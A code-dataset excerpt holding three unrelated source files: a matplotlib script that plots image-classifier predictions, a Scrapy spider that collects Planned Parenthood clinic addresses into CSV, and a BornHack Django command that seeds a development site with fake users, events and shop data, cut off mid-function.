def plot_image(i, predictions_array, true_label, img):
predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
plt.imshow(img, cmap=plt.cm.binary)
predicted_label = np.argmax(predictions_array)
if predicted_label == true_label:
color = 'blue'
else:
color = 'red'
plt.xlabel("{} {:2.0f}% ({})".format(class_names[predicted_label],
100*np.max(predictions_array),
class_names[true_label]),
color=color)
def plot_value_array(i, predictions_array, true_label):
predictions_array, true_label = predictions_array[i], true_label[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
thisplot = plt.bar(range(10), predictions_array, color="#777777")
plt.ylim([0, 1])
predicted_label = np.argmax(predictions_array)
thisplot[predicted_label].set_color('red')
thisplot[true_label].set_color('blue')
num_rows = 5
num_cols = 3
num_images = num_rows*num_cols
plt.figure(figsize=(2*2*num_cols, 2*num_rows))
for i in range(num_images):
plt.subplot(num_rows, 2*num_cols, 2*i+1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(num_rows, 2*num_cols, 2*i+2)
plot_value_array(i, predictions, test_labels)
img = cv2.imread("img.jpg", 0)
img = img / 256
test_images[0] = img
predictions = model.predict(test_images)
def plot_image(i, predictions_array, true_label, img):
predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
plt.imshow(img, cmap=plt.cm.binary)
predicted_label = np.argmax(predictions_array)
if predicted_label == true_label:
color = 'blue'
else:
color = 'red'
plt.xlabel("{} {:2.0f}% ({})".format(class_names[predicted_label],
100*np.max(predictions_array),
class_names[true_label]),
color=color)
def plot_value_array(i, predictions_array, true_label):
predictions_array, true_label = predictions_array[i], true_label[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
thisplot = plt.bar(range(10), predictions_array, color="#777777")
plt.ylim([0, 1])
predicted_label = np.argmax(predictions_array)
thisplot[predicted_label].set_color('red')
#thisplot[true_label].set_color('blue')
i = 1
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
img2 = cv2.imread("img2.jpg", 0)
img2 = img2 / 256
test_images[1] = img2
img3 = cv2.imread("img3.png", 0)
img3 = img3 / 256
test_images[2] = img3
i = 2
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
img4 = cv2.imread("img4.jpg", 0)
img4 = img4 / 256
test_images[3] = img4
i = 3
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
new_images = test_images[0:3]
img4 = cv2.imread("img6.jpg", 0)
img4 = img4 / 256
new_images[2] = img4
new_preds = model.predict(new_images)
``` |
{
"source": "johncmerfeld/PlannedParenthoodLocations",
"score": 3
} |
#### File: johncmerfeld/PlannedParenthoodLocations/pp_scraper.py
```python
import scrapy, json
# read from the list of URLS generated previously
def get_urls():
file = "health_centers.json"
urls = []
with open(file) as f:
links = json.load(f)
for i in range(len(links)):
link = links[i]["link"]
urls.append(link)
return urls
class PlannedParenthoodScraper(scrapy.Spider):
"""
This class first requests base urls, then from the base urls
we extract the next urls to call. We call all the possible urls
and download the content from each one of them.
"""
name = "pp_address_scrapper"
def start_requests(self):
urls = get_urls()
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
for post in response.xpath('//p[@class="address-loc"]'):
address = post.xpath('//span[@itemprop="streetAddress"]/text()').get()
locality = post.xpath('//span[@itemprop="addressLocality"]/text()').get()
region = post.xpath('//span[@itemprop="addressRegion"]/text()').get()
postal = post.xpath('//span[@itemprop="postalCode"]/text()').get()
yield {"address" : address,
"locality": locality,
"region" : region,
"postal" : postal}
with open("addresses.json") as f:
data = json.load(f)
import csv
with open('health_centers.csv', 'w', newline='') as csvfile:
fieldnames = ["address", "locality", "region", "postal"]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for row in data:
writer.writerow(row)
``` |
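A hedged sketch of running the spider programmatically (the scrapy CLI, e.g. `scrapy runspider pp_scraper.py -o addresses.json`, is the usual route). Note that the module-level CSV conversion at the bottom of the file runs at import time and expects `addresses.json` to already exist, and the `FEEDS` setting shown requires a reasonably recent Scrapy:
```python
from scrapy.crawler import CrawlerProcess

# Assumes health_centers.json is present in the working directory.
process = CrawlerProcess(settings={
    "FEEDS": {"addresses.json": {"format": "json"}},  # where scraped items go
})
process.crawl(PlannedParenthoodScraper)
process.start()  # blocks until the crawl finishes
```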
{
"source": "johncoffee/bornhack-website",
"score": 2
} |
#### File: management/commands/bootstrap-devsite.py
```python
import logging
import random
import sys
from datetime import datetime, timedelta
import factory
import pytz
from allauth.account.models import EmailAddress
from camps.models import Camp
from django.contrib.auth.models import User
from django.contrib.gis.geos import Point
from django.core.exceptions import ValidationError
from django.core.management.base import BaseCommand
from django.db.models.signals import post_save
from django.utils import timezone
from django.utils.crypto import get_random_string
from events.models import Routing, Type
from facilities.models import (
Facility,
FacilityFeedback,
FacilityQuickFeedback,
FacilityType,
)
from faker import Faker
from feedback.models import Feedback
from info.models import InfoCategory, InfoItem
from news.models import NewsItem
from profiles.models import Profile
from program.autoscheduler import AutoScheduler
from program.models import (
Event,
EventLocation,
EventProposal,
EventSession,
EventSlot,
EventTrack,
EventType,
SpeakerProposal,
Url,
UrlType,
)
from program.utils import (
get_speaker_availability_form_matrix,
save_speaker_availability,
)
from rideshare.models import Ride
from shop.models import Order, Product, ProductCategory
from sponsors.models import Sponsor, SponsorTier
from teams.models import Team, TeamMember, TeamShift, TeamTask
from tickets.models import TicketType
from tokens.models import Token, TokenFind
from utils.slugs import unique_slugify
from villages.models import Village
fake = Faker()
tz = pytz.timezone("Europe/Copenhagen")
logger = logging.getLogger("bornhack.%s" % __name__)
@factory.django.mute_signals(post_save)
class ProfileFactory(factory.django.DjangoModelFactory):
class Meta:
model = Profile
user = factory.SubFactory("self.UserFactory", profile=None)
name = factory.Faker("name")
description = factory.Faker("text")
public_credit_name = factory.Faker("name")
public_credit_name_approved = True
@factory.django.mute_signals(post_save)
class UserFactory(factory.django.DjangoModelFactory):
class Meta:
model = User
profile = factory.RelatedFactory(ProfileFactory, "user")
class EmailAddressFactory(factory.django.DjangoModelFactory):
class Meta:
model = EmailAddress
primary = False
verified = True
def output_fake_md_description():
fake_text = "\n".join(fake.paragraphs(nb=3, ext_word_list=None))
fake_text += "\n\n"
fake_text += "\n".join(fake.paragraphs(nb=3, ext_word_list=None))
fake_text += "\n\n"
fake_text += "## " + fake.sentence(nb_words=3) + "\n"
fake_text += "\n".join(fake.paragraphs(nb=3, ext_word_list=None))
fake_text += "\n\n"
fake_text += ''
fake_text += "\n\n"
fake_text += "\n".join(fake.paragraphs(nb=3, ext_word_list=None))
fake_text += "\n\n"
fake_text += "* [" + fake.sentence(nb_words=3) + "](" + fake.uri() + ")\n"
fake_text += "* [" + fake.sentence(nb_words=3) + "](" + fake.uri() + ")\n"
return fake_text
def output_fake_description():
fake_text = "\n".join(fake.paragraphs(nb=3, ext_word_list=None))
fake_text += "* [" + fake.sentence(nb_words=3) + "](" + fake.uri() + ")\n"
return fake_text
class SpeakerProposalFactory(factory.django.DjangoModelFactory):
class Meta:
model = SpeakerProposal
name = factory.Faker("name")
email = factory.Faker("email")
biography = output_fake_md_description()
submission_notes = factory.Iterator(["", output_fake_description()])
needs_oneday_ticket = factory.Iterator([True, False])
class EventProposalFactory(factory.django.DjangoModelFactory):
class Meta:
model = EventProposal
user = factory.Iterator(User.objects.all())
title = factory.Faker("sentence")
abstract = output_fake_md_description()
allow_video_recording = factory.Iterator([True, True, True, False])
submission_notes = factory.Iterator(["", output_fake_description()])
use_provided_speaker_laptop = factory.Iterator([True, False])
class EventProposalUrlFactory(factory.django.DjangoModelFactory):
class Meta:
model = Url
url = factory.Faker("url")
url_type = factory.Iterator(UrlType.objects.all())
class SpeakerProposalUrlFactory(factory.django.DjangoModelFactory):
class Meta:
model = Url
url = factory.Faker("url")
url_type = factory.Iterator(UrlType.objects.all())
class Command(BaseCommand):
args = "none"
help = "Create mock data for development instances"
def create_camps(self):
self.output("Creating camps...")
camps = [
dict(year=2016, tagline="Initial Commit", colour="#004dff", read_only=True),
dict(year=2017, tagline="Make Tradition", colour="#750787", read_only=True),
dict(year=2018, tagline="scale it", colour="#008026", read_only=True),
dict(year=2019, tagline="a new /home", colour="#ffed00", read_only=True),
dict(year=2020, tagline="Going Viral", colour="#ff8c00", read_only=False),
dict(year=2021, tagline="Undecided", colour="#e40303", read_only=False),
]
camp_instances = []
for camp in camps:
year = camp["year"]
read_only = camp["read_only"]
camp_instances.append(
(
Camp.objects.create(
title="BornHack {}".format(year),
tagline=camp["tagline"],
slug="bornhack-{}".format(year),
shortslug="bornhack-{}".format(year),
buildup=(
tz.localize(datetime(year, 8, 25, 12, 0)),
tz.localize(datetime(year, 8, 27, 12, 0)),
),
camp=(
tz.localize(datetime(year, 8, 27, 12, 0)),
tz.localize(datetime(year, 9, 3, 12, 0)),
),
teardown=(
tz.localize(datetime(year, 9, 3, 12, 0)),
tz.localize(datetime(year, 9, 5, 12, 0)),
),
colour=camp["colour"],
),
read_only,
)
)
return camp_instances
def create_event_routing_types(self):
t, created = Type.objects.get_or_create(name="public_credit_name_changed")
t, created = Type.objects.get_or_create(name="ticket_created")
def create_users(self):
self.output("Creating users...")
users = {}
for i in range(0, 16):
username = "user{}".format(i)
user = UserFactory.create(
username=username, email="{}<EMAIL>".format(username)
)
user.set_password(<PASSWORD>)
user.save()
users[i] = user
EmailAddressFactory.create(
                user=user, email="{}<EMAIL>".format(username)
)
admin = User.objects.create_superuser(
username="admin", email="<EMAIL>", password="<PASSWORD>"
)
users["admin"] = admin
admin.profile.name = "Administrator"
admin.profile.description = "Default adminstrative user"
admin.profile.public_credit_name = "Administrator"
admin.profile.public_credit_name_approved = True
admin.profile.save()
EmailAddress.objects.create(
user=admin, email="<EMAIL>", verified=True, primary=True
)
return users
def create_news(self):
NewsItem.objects.create(
title="unpublished news item", content="unpublished news body here"
)
def create_quickfeedback_options(self):
options = {}
self.output("Creating quickfeedback options")
options["na"] = FacilityQuickFeedback.objects.create(
feedback="N/A", icon="fas fa-times"
)
options["attention"] = FacilityQuickFeedback.objects.create(
feedback="Needs attention"
)
options["toiletpaper"] = FacilityQuickFeedback.objects.create(
feedback="Needs more toiletpaper", icon="fas fa-toilet-paper"
)
options["cleaning"] = FacilityQuickFeedback.objects.create(
feedback="Needs cleaning", icon="fas fa-broom"
)
options["power"] = FacilityQuickFeedback.objects.create(
feedback="No power", icon="fas fa-bolt"
)
return options
def create_facility_types(self, camp, teams, options):
types = {}
self.output("Creating facility types...")
types["toilet"] = FacilityType.objects.create(
name="Toilets",
description="All the toilets",
icon="fas fa-toilet",
marker="greyIcon",
responsible_team=teams["shit"],
)
types["toilet"].quickfeedback_options.add(options["na"])
types["toilet"].quickfeedback_options.add(options["attention"])
types["toilet"].quickfeedback_options.add(options["toiletpaper"])
types["toilet"].quickfeedback_options.add(options["cleaning"])
types["power"] = FacilityType.objects.create(
name="Power Infrastructure",
description="Power related infrastructure, distribution points, distribution cables, and so on.",
icon="fas fa-plug",
marker="goldIcon",
responsible_team=teams["power"],
)
types["power"].quickfeedback_options.add(options["attention"])
types["power"].quickfeedback_options.add(options["power"])
return types
def create_facilities(self, facility_types):
facilities = {}
self.output("Creating facilities...")
facilities["toilet1"] = Facility.objects.create(
facility_type=facility_types["toilet"],
name="Toilet NOC East",
description="Toilet on the east side of the NOC building",
location=Point(9.939783, 55.387217),
)
facilities["toilet2"] = Facility.objects.create(
facility_type=facility_types["toilet"],
name="Toilet NOC West",
description="Toilet on the west side of the NOC building",
location=Point(9.93967, 55.387197),
)
facilities["pdp1"] = Facility.objects.create(
facility_type=facility_types["power"],
name="PDP1",
description="In orga area",
location=Point(9.94079, 55.388022),
)
facilities["pdp2"] = Facility.objects.create(
facility_type=facility_types["power"],
name="PDP2",
description="In bar area",
location=Point(9.942036, 55.387891),
)
facilities["pdp3"] = Facility.objects.create(
facility_type=facility_types["power"],
name="PDP3",
description="In speaker tent",
location=Point(9.938416, 55.387109),
)
facilities["pdp4"] = Facility.objects.create(
facility_type=facility_types["power"],
name="PDP4",
description="In food area",
location=Point(9.940146, 55.386983),
)
return facilities
def create_facility_feedbacks(self, facilities, options, users):
self.output("Creating facility feedbacks...")
FacilityFeedback.objects.create(
user=users[1],
facility=facilities["toilet1"],
quick_feedback=options["attention"],
comment="Something smells wrong",
urgent=True,
)
FacilityFeedback.objects.create(
user=users[2],
facility=facilities["toilet1"],
quick_feedback=options["toiletpaper"],
urgent=False,
)
FacilityFeedback.objects.create(
facility=facilities["toilet2"],
quick_feedback=options["cleaning"],
comment="This place needs cleaning please. Anonymous feedback.",
urgent=False,
)
FacilityFeedback.objects.create(
facility=facilities["pdp1"],
quick_feedback=options["attention"],
comment="Rain cover needs some work, and we need more free plugs! This feedback is submitted anonymously.",
urgent=False,
)
FacilityFeedback.objects.create(
user=users[5],
facility=facilities["pdp2"],
quick_feedback=options["power"],
comment="No power, please help",
urgent=True,
)
def create_event_types(self):
types = {}
self.output("Creating event types...")
types["workshop"] = EventType.objects.create(
name="Workshop",
slug="workshop",
color="#ff9900",
light_text=False,
public=True,
description="Workshops actively involve the participants in the learning experience",
icon="toolbox",
host_title="Host",
event_duration_minutes="180",
support_autoscheduling=True,
support_speaker_event_conflicts=True,
)
types["talk"] = EventType.objects.create(
name="Talk",
slug="talk",
color="#2D9595",
light_text=True,
public=True,
description="A presentation on a stage",
icon="chalkboard-teacher",
host_title="Speaker",
event_duration_minutes="60",
support_autoscheduling=True,
support_speaker_event_conflicts=True,
)
types["lightning"] = EventType.objects.create(
name="Lightning Talk",
slug="lightning-talk",
color="#ff0000",
light_text=True,
public=True,
description="A short 5-10 minute presentation",
icon="bolt",
host_title="Speaker",
event_duration_minutes="5",
support_speaker_event_conflicts=True,
)
types["music"] = EventType.objects.create(
name="Music Act",
slug="music",
color="#1D0095",
light_text=True,
public=True,
description="A musical performance",
icon="music",
host_title="Artist",
event_duration_minutes="180",
support_autoscheduling=True,
support_speaker_event_conflicts=True,
)
types["keynote"] = EventType.objects.create(
name="Keynote",
slug="keynote",
color="#FF3453",
light_text=True,
description="A keynote presentation",
icon="star",
host_title="Speaker",
event_duration_minutes="90",
support_autoscheduling=True,
support_speaker_event_conflicts=True,
)
types["debate"] = EventType.objects.create(
name="Debate",
slug="debate",
color="#F734C3",
light_text=True,
description="A panel debate with invited guests",
icon="users",
host_title="Guest",
public=True,
event_duration_minutes="120",
support_autoscheduling=True,
support_speaker_event_conflicts=True,
)
types["facility"] = EventType.objects.create(
name="Facilities",
slug="facilities",
color="#cccccc",
light_text=False,
include_in_event_list=False,
description="Events involving facilities like bathrooms, food area and so on",
icon="home",
host_title="Host",
event_duration_minutes="720",
support_speaker_event_conflicts=False,
)
types["recreational"] = EventType.objects.create(
name="Recreational Event",
slug="recreational-event",
color="#0000ff",
light_text=True,
public=True,
description="Events of a recreational nature",
icon="dice",
host_title="Host",
event_duration_minutes="600",
support_autoscheduling=False,
support_speaker_event_conflicts=True,
)
return types
def create_url_types(self):
self.output("Creating UrlType objects...")
t, created = UrlType.objects.get_or_create(
name="Other", defaults={"icon": "fas fa-link"}
)
t, created = UrlType.objects.get_or_create(
name="Homepage", defaults={"icon": "fas fa-link"}
)
t, created = UrlType.objects.get_or_create(
name="Slides", defaults={"icon": "fas fa-chalkboard-teacher"}
)
t, created = UrlType.objects.get_or_create(
name="Twitter", defaults={"icon": "fab fa-twitter"}
)
t, created = UrlType.objects.get_or_create(
name="Mastodon", defaults={"icon": "fab fa-mastodon"}
)
t, created = UrlType.objects.get_or_create(
name="Facebook", defaults={"icon": "fab fa-facebook"}
)
t, created = UrlType.objects.get_or_create(
name="Project", defaults={"icon": "fas fa-link"}
)
t, created = UrlType.objects.get_or_create(
name="Blog", defaults={"icon": "fas fa-link"}
)
t, created = UrlType.objects.get_or_create(
name="Github", defaults={"icon": "fab fa-github"}
)
t, created = UrlType.objects.get_or_create(
name="Keybase", defaults={"icon": "fab fa-keybase"}
)
t, created = UrlType.objects.get_or_create(
name="Recording", defaults={"icon": "fas fa-film"}
)
def create_product_categories(self):
categories = {}
self.output("Creating productcategories...")
categories["transportation"] = ProductCategory.objects.create(
name="Transportation", slug="transportation"
)
categories["merchandise"] = ProductCategory.objects.create(
name="Merchandise", slug="merchandise"
)
categories["tickets"] = ProductCategory.objects.create(
name="Tickets", slug="tickets"
)
categories["villages"] = ProductCategory.objects.create(
name="Villages", slug="villages"
)
return categories
def create_global_products(self, categories):
products = {}
self.output("Creating global products...")
name = "PROSA bus transport (PROSA members only)"
products["product0"] = Product.objects.create(
name=name,
category=categories["transportation"],
price=125,
description="PROSA is sponsoring a bustrip from Copenhagen to the venue and back.",
available_in=(
tz.localize(datetime(2017, 3, 1, 11, 0)),
tz.localize(datetime(2017, 10, 30, 11, 30)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["transportation"]
).values_list("slug", flat=True),
),
)
name = "PROSA bus transport (open for everyone)"
products["product1"] = Product.objects.create(
name=name,
category=categories["transportation"],
price=125,
description="PROSA is sponsoring a bustrip from Copenhagen to the venue and back.",
available_in=(
tz.localize(datetime(2017, 3, 1, 11, 0)),
tz.localize(datetime(2017, 10, 30, 11, 30)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["transportation"]
).values_list("slug", flat=True),
),
)
name = "T-shirt (large)"
products["product2"] = Product.objects.create(
name=name,
category=categories["merchandise"],
price=160,
description="Get a nice t-shirt",
available_in=(
tz.localize(datetime(2017, 3, 1, 11, 0)),
tz.localize(datetime(2017, 10, 30, 11, 30)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["merchandise"]
).values_list("slug", flat=True),
),
)
name = "Village tent 3x3 meters, no floor"
products["tent1"] = Product.objects.create(
name=name,
description="A description of the tent goes here",
price=3325,
category=categories["villages"],
available_in=(
tz.localize(datetime(2017, 3, 1, 12, 0)),
tz.localize(datetime(2017, 8, 20, 12, 0)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["villages"]
).values_list("slug", flat=True),
),
)
name = "Village tent 3x3 meters, with floor"
products["tent2"] = Product.objects.create(
name=name,
description="A description of the tent goes here",
price=3675,
category=categories["villages"],
available_in=(
tz.localize(datetime(2017, 3, 1, 12, 0)),
tz.localize(datetime(2017, 8, 20, 12, 0)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["villages"]
).values_list("slug", flat=True),
),
)
return products
def create_camp_ticket_types(self, camp):
types = {}
self.output("Creating tickettypes for {}...".format(camp.camp.lower.year))
types["adult_full_week"] = TicketType.objects.create(
name="Adult Full Week", camp=camp
)
types["adult_one_day"] = TicketType.objects.create(
name="Adult One Day", camp=camp
)
types["child_full_week"] = TicketType.objects.create(
name="Child Full Week", camp=camp
)
types["child_one_day"] = TicketType.objects.create(
name="Child One Day", camp=camp
)
return types
def create_camp_products(self, camp, categories, ticket_types):
products = {}
year = camp.camp.lower.year
name = "BornHack {} Standard ticket".format(year)
products["ticket1"] = Product.objects.create(
name=name,
description="A ticket",
price=1200,
category=categories["tickets"],
available_in=(
tz.localize(datetime(year, 1, 1, 12, 0)),
tz.localize(datetime(year, 12, 20, 12, 0)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["tickets"]
).values_list("slug", flat=True),
),
ticket_type=ticket_types["adult_full_week"],
)
name = "BornHack {} Hacker ticket".format(year)
products["ticket2"] = Product.objects.create(
name=name,
description="Another ticket",
price=1337,
category=categories["tickets"],
available_in=(
tz.localize(datetime(year, 1, 1, 12, 0)),
tz.localize(datetime(year, 12, 20, 12, 0)),
),
slug=unique_slugify(
name,
slugs_in_use=Product.objects.filter(
category=categories["tickets"]
).values_list("slug", flat=True),
),
ticket_type=ticket_types["adult_full_week"],
)
return products
def create_orders(self, users, global_products, camp_products):
orders = {}
self.output("Creating orders...")
orders[0] = Order.objects.create(
user=users[1], payment_method="cash", open=None, paid=True
)
orders[0].orderproductrelation_set.create(
product=camp_products["ticket1"], quantity=1
)
orders[0].orderproductrelation_set.create(
product=global_products["tent1"], quantity=1
)
orders[0].mark_as_paid(request=None)
orders[1] = Order.objects.create(
user=users[2], payment_method="cash", open=None
)
orders[1].orderproductrelation_set.create(
product=camp_products["ticket1"], quantity=1
)
orders[1].orderproductrelation_set.create(
product=global_products["tent2"], quantity=1
)
orders[1].mark_as_paid(request=None)
orders[2] = Order.objects.create(
user=users[3], payment_method="cash", open=None
)
orders[2].orderproductrelation_set.create(
product=camp_products["ticket2"], quantity=1
)
orders[2].orderproductrelation_set.create(
product=camp_products["ticket1"], quantity=1
)
orders[2].orderproductrelation_set.create(
product=global_products["tent2"], quantity=1
)
orders[2].mark_as_paid(request=None)
orders[3] = Order.objects.create(
user=users[4], payment_method="cash", open=None
)
orders[3].orderproductrelation_set.create(
product=global_products["product0"], quantity=1
)
orders[3].orderproductrelation_set.create(
product=camp_products["ticket2"], quantity=1
)
orders[3].orderproductrelation_set.create(
product=global_products["tent1"], quantity=1
)
orders[3].mark_as_paid(request=None)
return orders
def create_camp_tracks(self, camp):
tracks = {}
year = camp.camp.lower.year
self.output("Creating event_tracks for {}...".format(year))
tracks[1] = EventTrack.objects.create(
camp=camp, name="BornHack", slug=camp.slug
)
return tracks
def create_event_locations(self, camp):
locations = {}
year = camp.camp.lower.year
self.output("Creating event_locations for {}...".format(year))
locations["speakers_tent"] = EventLocation.objects.create(
name="<NAME>",
slug="speakers-tent",
icon="comment",
camp=camp,
capacity=150,
)
locations["workshop_room_1"] = EventLocation.objects.create(
name="Workshop room 1 (big)",
slug="workshop-room-1",
icon="briefcase",
camp=camp,
capacity=50,
)
locations["workshop_room_2"] = EventLocation.objects.create(
name="Workshop room 2 (small)",
slug="workshop-room-2",
icon="briefcase",
camp=camp,
capacity=25,
)
locations["workshop_room_3"] = EventLocation.objects.create(
name="Workshop room 3 (small)",
slug="workshop-room-3",
icon="briefcase",
camp=camp,
capacity=25,
)
locations["bar_area"] = EventLocation.objects.create(
name="Bar Area",
slug="bar-area",
icon="glass-cheers",
camp=camp,
capacity=50,
)
locations["food_area"] = EventLocation.objects.create(
name="Food Area", slug="food-area", icon="utensils", camp=camp, capacity=50,
)
locations["infodesk"] = EventLocation.objects.create(
name="Infodesk", slug="infodesk", icon="info", camp=camp, capacity=20,
)
        # add workshop room conflicts (the big room can not be used while either
# of the small rooms are in use, and vice versa)
locations["workshop_room_1"].conflicts.add(locations["workshop_room_2"])
locations["workshop_room_1"].conflicts.add(locations["workshop_room_3"])
return locations
def create_camp_news(self, camp):
year = camp.camp.lower.year
self.output("Creating news for {}...".format(year))
NewsItem.objects.create(
title="Welcome to {}".format(camp.title),
content="news body here with <b>html</b> support",
published_at=tz.localize(datetime(year, 8, 27, 12, 0)),
)
NewsItem.objects.create(
title="{} is over".format(camp.title),
content="news body here",
published_at=tz.localize(datetime(year, 9, 4, 12, 0)),
)
def create_camp_event_sessions(self, camp, event_types, event_locations):
self.output(f"Creating EventSessions for {camp}...")
days = camp.get_days(camppart="camp")[1:-1]
for day in days:
start = day.lower
EventSession.objects.create(
camp=camp,
event_type=event_types["talk"],
event_location=event_locations["speakers_tent"],
when=(
tz.localize(datetime(start.year, start.month, start.day, 11, 0)),
tz.localize(datetime(start.year, start.month, start.day, 18, 0)),
),
)
EventSession.objects.create(
camp=camp,
event_type=event_types["recreational"],
event_location=event_locations["speakers_tent"],
event_duration_minutes=60,
when=(
tz.localize(datetime(start.year, start.month, start.day, 12, 0)),
tz.localize(datetime(start.year, start.month, start.day, 13, 0)),
),
)
EventSession.objects.create(
camp=camp,
event_type=event_types["music"],
event_location=event_locations["bar_area"],
when=(
tz.localize(datetime(start.year, start.month, start.day, 22, 0)),
tz.localize(datetime(start.year, start.month, start.day, 22, 0))
+ timedelta(hours=3),
),
)
EventSession.objects.create(
camp=camp,
event_type=event_types["workshop"],
event_location=event_locations["workshop_room_1"],
when=(
tz.localize(datetime(start.year, start.month, start.day, 12, 0)),
tz.localize(datetime(start.year, start.month, start.day, 18, 0)),
),
)
EventSession.objects.create(
camp=camp,
event_type=event_types["workshop"],
event_location=event_locations["workshop_room_2"],
when=(
tz.localize(datetime(start.year, start.month, start.day, 12, 0)),
tz.localize(datetime(start.year, start.month, start.day, 18, 0)),
),
)
EventSession.objects.create(
camp=camp,
event_type=event_types["workshop"],
event_location=event_locations["workshop_room_3"],
when=(
tz.localize(datetime(start.year, start.month, start.day, 12, 0)),
tz.localize(datetime(start.year, start.month, start.day, 18, 0)),
),
)
# create sessions for the keynotes
for day in [days[1], days[3], days[5]]:
EventSession.objects.create(
camp=camp,
event_type=event_types["keynote"],
event_location=event_locations["speakers_tent"],
when=(
tz.localize(
datetime(day.lower.year, day.lower.month, day.lower.day, 20, 0)
),
tz.localize(
datetime(day.lower.year, day.lower.month, day.lower.day, 21, 30)
),
),
)
def create_camp_proposals(self, camp, event_types):
year = camp.camp.lower.year
self.output("Creating event- and speaker_proposals for {}...".format(year))
# add 45 talks
talkproposals = EventProposalFactory.create_batch(
45,
track=factory.Iterator(camp.event_tracks.all()),
event_type=event_types["talk"],
)
# and 15 workshops
workshopproposals = EventProposalFactory.create_batch(
15,
track=factory.Iterator(camp.event_tracks.all()),
event_type=event_types["workshop"],
)
# and 3 keynotes
# (in the real world these are submitted as talks
# and promoted to keynotes by the content team)
keynoteproposals = EventProposalFactory.create_batch(
3,
track=factory.Iterator(camp.event_tracks.all()),
event_type=event_types["keynote"],
)
tags = [
"infosec",
"hardware",
"politics",
"django",
"development",
"games",
"privacy",
"vampires",
"linux",
]
for ep in talkproposals + workshopproposals + keynoteproposals:
# create a speakerproposal for this EventProposal
sp = SpeakerProposalFactory(camp=camp, user=ep.user)
ep.speakers.add(sp)
# 20% chance we add an extra speaker
if random.randint(1, 10) > 8:
other_speakers = SpeakerProposal.objects.filter(camp=camp).exclude(
uuid=sp.uuid
)
# ... if we have any...
if other_speakers.exists():
# add an extra speaker
ep.speakers.add(random.choice(other_speakers))
# add tags for 2 out of 3 events
if random.choice([True, True, False]):
# add 1-3 tags for this EP
ep.tags.add(*random.sample(tags, k=random.randint(1, 3)))
EventProposal.objects.create(
user=random.choice(User.objects.all()),
title="Lunch break",
abstract="Daily lunch break. Remember to drink water.",
event_type=event_types["recreational"],
track=random.choice(camp.event_tracks.all()),
).mark_as_approved()
def create_proposal_urls(self, camp):
""" Create URL objects for the proposals """
year = camp.camp.lower.year
self.output(
"Creating URLs for Speaker- and EventProposals for {}...".format(year)
)
SpeakerProposalUrlFactory.create_batch(
100,
speaker_proposal=factory.Iterator(
SpeakerProposal.objects.filter(camp=camp)
),
)
EventProposalUrlFactory.create_batch(
100,
event_proposal=factory.Iterator(
EventProposal.objects.filter(track__camp=camp)
),
)
def generate_speaker_availability(self, camp):
""" Create SpeakerAvailability objects for the SpeakerProposals """
year = camp.camp.lower.year
self.output(
"Generating random SpeakerProposalAvailability for {}...".format(year)
)
for sp in camp.speaker_proposals.all():
# generate a matrix for this speaker_proposals event_types
matrix = get_speaker_availability_form_matrix(
sessions=sp.camp.event_sessions.filter(
event_type__in=sp.event_types.all(),
)
)
# build a "form" object so we can reuse save_speaker_availability()
class FakeForm:
cleaned_data = {}
form = FakeForm()
for date, daychunks in matrix.items():
# 90% chance we have info for any given day
if random.randint(1, 100) > 90:
# no availability info for this entire day, sorry
continue
for daychunk, data in daychunks.items():
if not data:
continue
# 90% chance this speaker is available for any given chunk
form.cleaned_data[data["fieldname"]] = random.randint(1, 100) < 90
# print(f"saving availability for speaker {sp}: {form.cleaned_data}")
save_speaker_availability(form, sp)
def approve_speaker_proposals(self, camp):
""" Approve all keynotes but reject 10% of other events """
for sp in camp.speaker_proposals.filter(
event_proposals__event_type__name="Keynote"
):
sp.mark_as_approved()
for sp in camp.speaker_proposals.filter(proposal_status="pending"):
# we do not approve all speakers
x = random.randint(1, 100)
if x < 90:
sp.mark_as_approved()
elif x < 95:
# leave this as pending
continue
else:
sp.mark_as_rejected()
def approve_event_proposals(self, camp):
for ep in camp.event_proposals.filter(proposal_status="pending"):
# are all speakers for this event approved?
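            # (Python for/else: the else branch below runs only if the loop
            # completes without break, i.e. every speaker proposal has a Speaker)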
for sp in ep.speakers.all():
if not hasattr(sp, "speaker"):
break
else:
# all speakers are approved, approve the event? always approve keynotes!
if random.randint(1, 100) < 90 or ep.event_type.name == "Keynote":
ep.mark_as_approved()
else:
ep.mark_as_rejected()
# set demand for workshops to see the autoscheduler in action
for event in camp.events.filter(event_type__name="Workshop"):
# this should put about half the workshops in the big room
# (since the small rooms have max. 25 ppl capacity)
event.demand = random.randint(10, 40)
event.save()
def create_camp_scheduling(self, camp):
year = camp.camp.lower.year
self.output("Creating scheduling for {}...".format(year))
# create a lunchbreak daily in speakers tent
lunch = Event.objects.get(track__camp=camp, title="Lunch break")
for day in camp.get_days(camppart="camp")[1:-1]:
date = day.lower.date()
start = tz.localize(datetime(date.year, date.month, date.day, 12, 0))
lunchslot = EventSlot.objects.get(
event_session__event_location=camp.event_locations.get(
name="Speakers Tent"
),
event_session__event_type=EventType.objects.get(
name="Recreational Event"
),
when=(start, start + timedelta(hours=1)),
)
lunchslot.event = lunch
lunchslot.autoscheduled = False
lunchslot.save()
# exercise the autoscheduler a bit
scheduler = AutoScheduler(camp=camp)
schedulestart = timezone.now()
try:
